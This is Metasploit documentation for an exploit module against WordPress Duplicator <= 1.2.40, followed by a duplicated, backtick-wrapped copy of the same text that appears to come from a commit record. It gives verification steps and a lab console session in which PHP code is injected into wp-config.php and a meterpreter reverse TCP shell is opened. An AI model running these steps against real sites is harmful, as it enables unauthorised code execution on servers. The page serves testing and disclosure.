documentation/modules/exploit/multi/php/wordpress_duplicator.md

Duplicator is a WordPress plugin that can be used to create a complete backup of a WordPress instance and restore it on a fresh server. The export method generates 2 files:
* An ZIP archive with the complete WordPress files and Duplicator specific files:
  * A copy of the installer.php script: installer-backup.php
  * A SQL script that will be used to restore the database content: database.sql
* An installer PHP script to restore the archive installer.php

When the installer.php completes its process, the following files remain in the directory and has to be manually deleted:
* The ZIP archive
* database.sql 
* installer-backup.php 
* installer-data.sql 
* installer-log.txt 
* installer.php 

## Vulnerable application

Install a vulnerable version of WordPress Duplicator (<= 1.2.40) and create a backup.
Put the install.php and archive files on a clean web server.

## Verification Steps


Confirm that check functionality works:
- [ ] Open a browser to check the installer.php file is accessible
- [ ] Start `msfconsole`
- [ ] `use exploit/multi/php/wordpress_duplicator-`
- [ ] Set the `RHOST`.
- [ ] Confirm the target is vulnerable: `check`
- [ ] Confirm that the target is vulnerable: `The target is vulnerable.`

Confirm that command execution functionality works:
- [ ] Set a payload: `set PAYLOAD php/meterpreter/reverse_tcp`
- [ ] Set `LHOST` and `LPORT`
- [ ] Run the exploit: `run`
- [ ] Confirm you have now a meterpreter session

## Options

**TARGETURI**

The path to the installer.php file to exploit By default, the path is `/installer.php`.


## Scenarios

### Meterpreter reverse tcp

```
msf5 > use exploit/multi/php/wordpress_duplicator 
msf5 exploit(multi/php/wordpress_duplicator) > set RHOSTS 192.168.56.101
RHOSTS => 192.168.56.101
msf5 exploit(multi/php/wordpress_duplicator) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf5 exploit(multi/php/wordpress_duplicator) > set TARGETURI /installer_vuln.php
TARGETURI => /installer_vuln.php
msf5 exploit(multi/php/wordpress_duplicator) > run

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Checking if the wp-config.php file already exists...
[*] This WordPress was not restored. Creating the wp-config.php file...
[*] Successfully created the wp-config.php file!
[*] All good! Injecting PHP code in the wp-config.php file...
[*] Requesting wp-config.php to execute the payload...
[*] Sending stage (37775 bytes) to 192.168.56.101

meterpreter > sysinfo 
Computer    : debian
OS          : Linux debian 4.9.0-6-amd64 #1 SMP Debian 4.9.88-1+deb9u1 (2018-05-07) x86_64
Meterpreter : php/linux
```
Added WordPress Duplicator <= 1.2.40 and documentation 2018-11-14 16:39:42 +01:00			`Duplicator is a WordPress plugin that can be used to create a complete backup of a WordPress instance and restore it on a fresh server. The export method generates 2 files:`
			`* An ZIP archive with the complete WordPress files and Duplicator specific files:`
			`* A copy of the installer.php script: installer-backup.php`
			`* A SQL script that will be used to restore the database content: database.sql`
			`* An installer PHP script to restore the archive installer.php`

			`When the installer.php completes its process, the following files remain in the directory and has to be manually deleted:`
			`* The ZIP archive`
			`* database.sql`
			`* installer-backup.php`
			`* installer-data.sql`
			`* installer-log.txt`
			`* installer.php`

			`## Vulnerable application`

			`Install a vulnerable version of WordPress Duplicator (<= 1.2.40) and create a backup.`
			`Put the install.php and archive files on a clean web server.`

			`## Verification Steps`


			`Confirm that check functionality works:`
			`- [ ] Open a browser to check the installer.php file is accessible`
			- [ ] Start `msfconsole`
			- [ ] `use exploit/multi/php/wordpress_duplicator-`
			- [ ] Set the `RHOST`.
			- [ ] Confirm the target is vulnerable: `check`
			- [ ] Confirm that the target is vulnerable: `The target is vulnerable.`

			`Confirm that command execution functionality works:`
			- [ ] Set a payload: `set PAYLOAD php/meterpreter/reverse_tcp`
			- [ ] Set `LHOST` and `LPORT`
			- [ ] Run the exploit: `run`
			`- [ ] Confirm you have now a meterpreter session`

			`## Options`

			`TARGETURI`

			The path to the installer.php file to exploit By default, the path is `/installer.php`.


			`## Scenarios`

			`### Meterpreter reverse tcp`

			```
			`msf5 > use exploit/multi/php/wordpress_duplicator`
			`msf5 exploit(multi/php/wordpress_duplicator) > set RHOSTS 192.168.56.101`
			`RHOSTS => 192.168.56.101`
			`msf5 exploit(multi/php/wordpress_duplicator) > set LHOST 192.168.56.1`
			`LHOST => 192.168.56.1`
			`msf5 exploit(multi/php/wordpress_duplicator) > set TARGETURI /installer_vuln.php`
			`TARGETURI => /installer_vuln.php`
			`msf5 exploit(multi/php/wordpress_duplicator) > run`

			`[*] Started reverse TCP handler on 192.168.56.1:4444`
			`[*] Checking if the wp-config.php file already exists...`
			`[*] This WordPress was not restored. Creating the wp-config.php file...`
			`[*] Successfully created the wp-config.php file!`
			`[*] All good! Injecting PHP code in the wp-config.php file...`
			`[*] Requesting wp-config.php to execute the payload...`
			`[*] Sending stage (37775 bytes) to 192.168.56.101`

			`meterpreter > sysinfo`
			`Computer : debian`
			`OS : Linux debian 4.9.0-6-amd64 #1 SMP Debian 4.9.88-1+deb9u1 (2018-05-07) x86_64`
			`Meterpreter : php/linux`
			```